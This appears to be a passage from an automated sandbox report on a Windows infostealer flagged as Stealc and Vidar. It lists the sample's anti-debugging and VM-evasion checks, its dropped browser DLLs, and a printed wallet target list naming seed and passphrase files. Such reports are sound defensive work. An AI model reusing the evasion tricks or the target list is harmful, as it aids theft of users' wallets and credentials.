Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC069A second address: 4DC0729 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAA34DB19BCh 0x00000008 jmp 00007FAA34DB19C2h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xchg eax, ebp 0x00000011 jmp 00007FAA34DB19C0h 0x00000016 push eax 0x00000017 jmp 00007FAA34DB19BBh 0x0000001c xchg eax, ebp 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007FAA34DB19C4h 0x00000024 add esi, 08D9AB28h 0x0000002a jmp 00007FAA34DB19BBh 0x0000002f popfd 0x00000030 pushad 0x00000031 jmp 00007FAA34DB19C6h 0x00000036 mov bx, ax 0x00000039 popad 0x0000003a popad 0x0000003b mov ebp, esp 0x0000003d pushad 0x0000003e push eax 0x0000003f push edx 0x00000040 mov ax, B1FFh 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC0769 second address: 4DC076D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC076D second address: 4DC0773 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC0773 second address: 4DC0799 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAA34ECFF63h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 16DA6DA9h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push ebx 0x00000014 pop ecx 0x00000015 mov ecx, edi 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC0799 second address: 4DC079F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC079F second address: 4DC07A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC07A3 second address: 4DC07A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC07A7 second address: 4DC07F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call 00007FAAA4F03799h 0x0000000d push 74DF27D0h 0x00000012 push dword ptr fs:[00000000h] 0x00000019 mov eax, dword ptr [esp+10h] 0x0000001d mov dword ptr [esp+10h], ebp 0x00000021 lea ebp, dword ptr [esp+10h] 0x00000025 sub esp, eax 0x00000027 push ebx 0x00000028 push esi 0x00000029 push edi 0x0000002a mov eax, dword ptr [74E80140h] 0x0000002f xor dword ptr [ebp-04h], eax 0x00000032 xor eax, ebp 0x00000034 push eax 0x00000035 mov dword ptr [ebp-18h], esp 0x00000038 push dword ptr [ebp-08h] 0x0000003b mov eax, dword ptr [ebp-04h] 0x0000003e mov dword ptr [ebp-04h], FFFFFFFEh 0x00000045 mov dword ptr [ebp-08h], eax 0x00000048 lea eax, dword ptr [ebp-10h] 0x0000004b mov dword ptr fs:[00000000h], eax 0x00000051 ret 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 pushfd 0x00000056 jmp 00007FAA34ECFF63h 0x0000005b sub al, FFFFFF9Eh 0x0000005e jmp 00007FAA34ECFF69h 0x00000063 popfd 0x00000064 jmp 00007FAA34ECFF60h 0x00000069 popad 0x0000006a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC07F9 second address: 4DC083C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAA34DB19BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and dword ptr [ebp-04h], 00000000h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FAA34DB19BBh 0x00000016 adc ch, 0000005Eh 0x00000019 jmp 00007FAA34DB19C9h 0x0000001e popfd 0x0000001f movzx ecx, dx 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC083C second address: 4DC085A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAA34ECFF5Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov di, 6370h 0x00000013 mov ebx, 153B469Ch 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC092F second address: 4DC093F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAA34DB19BCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC093F second address: 4DC0943 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC0943 second address: 4DC0953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 dec edi 0x00000009 pushad 0x0000000a mov eax, edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC0953 second address: 4DC0957 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC0957 second address: 4DC099B instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FAA34DB19C5h 0x00000008 xor cx, 9E96h 0x0000000d jmp 00007FAA34DB19C1h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 lea ebx, dword ptr [edi+01h] 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FAA34DB19BDh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC099B second address: 4DC09FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAA34ECFF61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov al, byte ptr [edi+01h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FAA34ECFF5Ch 0x00000013 sbb esi, 677B1918h 0x00000019 jmp 00007FAA34ECFF5Bh 0x0000001e popfd 0x0000001f push eax 0x00000020 push edx 0x00000021 pushfd 0x00000022 jmp 00007FAA34ECFF66h 0x00000027 and al, 00000078h 0x0000002a jmp 00007FAA34ECFF5Bh 0x0000002f popfd 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC0B58 second address: 4DC0BC4 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FAA34DB19C5h 0x00000008 xor eax, 5BF7D076h 0x0000000e jmp 00007FAA34DB19C1h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 mov ecx, dword ptr [ebp-10h] 0x0000001a jmp 00007FAA34DB19BEh 0x0000001f mov dword ptr fs:[00000000h], ecx 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 pushfd 0x0000002a jmp 00007FAA34DB19BCh 0x0000002f sbb si, 74C8h 0x00000034 jmp 00007FAA34DB19BBh 0x00000039 popfd 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC0BC4 second address: 4DC0BF7 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 004D6A3Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edi, eax 0x0000000b popad 0x0000000c pop ecx 0x0000000d jmp 00007FAA34ECFF5Eh 0x00000012 pop edi 0x00000013 jmp 00007FAA34ECFF60h 0x00000018 pop esi 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC0BF7 second address: 4DC0BFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC0EA0 second address: 4DC0EB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, si 0x00000006 mov edi, esi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov si, 999Fh 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC0EB4 second address: 4DC0EF4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAA34DB19C5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushad 0x0000000c mov ecx, 797EA89Bh 0x00000011 popad 0x00000012 popad 0x00000013 mov ebp, esp 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov cl, bl 0x0000001a call 00007FAA34DB19C4h 0x0000001f pop esi 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC0EF4 second address: 4DC0F20 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop ebx 0x00000005 pushfd 0x00000006 jmp 00007FAA34ECFF5Ah 0x0000000b and eax, 05016DC8h 0x00000011 jmp 00007FAA34ECFF5Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pop ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC0F20 second address: 4DC0F24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC0F24 second address: 4DC0F3F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAA34ECFF67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC0F3F second address: 4DC0F45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DC0F45 second address: 4DC0F49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 63DC0E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 7E69A1 instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\chrome.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\file.exe API coverage: 0.8 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\file.exe TID: 7460 Thread sleep time: -32016s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7436 Thread sleep time: -36018s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C51C930 GetSystemInfo,VirtualAlloc,GetSystemInfo,VirtualFree,VirtualAlloc, 0_2_6C51C930
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: file.exe, file.exe, 00000000.00000002.2081510945.00000000007C8000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.2082345429.0000000001213000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWu
Source: chrome.exe, 00000001.00000002.1930318285.00004A3000AF4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware
Source: chrome.exe, 00000001.00000002.1940646655.00004A3001074000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware Virtual USB Mouse
Source: file.exe, 00000000.00000002.2082345429.000000000119E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.2082345429.0000000001213000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2082345429.00000000011E4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.2081510945.00000000007C8000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: chrome.exe, 00000001.00000002.1931293841.00004A3000CE8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=a35616fe-8dd3-4009-8ae6-e61c554c10fd
Source: chrome.exe, 00000001.00000002.1919462582.0000016314AA8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: file.exe, 00000000.00000002.2082345429.000000000119E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMwareK
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\Desktop\file.exe File opened: NTICE
Source: C:\Users\user\Desktop\file.exe File opened: SICE
Source: C:\Users\user\Desktop\file.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C565FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose, 0_2_6C565FF0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C56C410 LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_6C56C410
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C53B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6C53B66C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C53B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6C53B1F7
Source: C:\Users\user\Desktop\file.exe Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: file.exe PID: 7420, type: MEMORYSTR
Source: file.exe, file.exe, 00000000.00000002.2081510945.00000000007C8000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: :Program Manager
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C53B341 cpuid 0_2_6C53B341
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5035A0 ?Startup@TimeStamp@mozilla@@SAXXZ,InitializeCriticalSectionAndSpinCount,getenv,QueryPerformanceFrequency,_strnicmp,GetSystemTimeAdjustment,__aulldiv,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,__aulldiv,strcmp,strcmp,_strnicmp, 0_2_6C5035A0

Stealing of Sensitive Information
barindex
Yara detected Stealc
Source: Yara match File source: 0.2.file.exe.350000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.1730489786.0000000004C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2082345429.000000000119E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2080967365.0000000000351000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 7420, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: file.exe PID: 7420, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: file.exe, 00000000.00000002.2080967365.0000000000436000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2080967365.0000000000464000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: \ElectronCash\wallets\
Source: file.exe, 00000000.00000002.2080967365.0000000000436000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2080967365.0000000000464000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: Jaxx Liberty
Source: file.exe, 00000000.00000002.2080967365.0000000000436000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
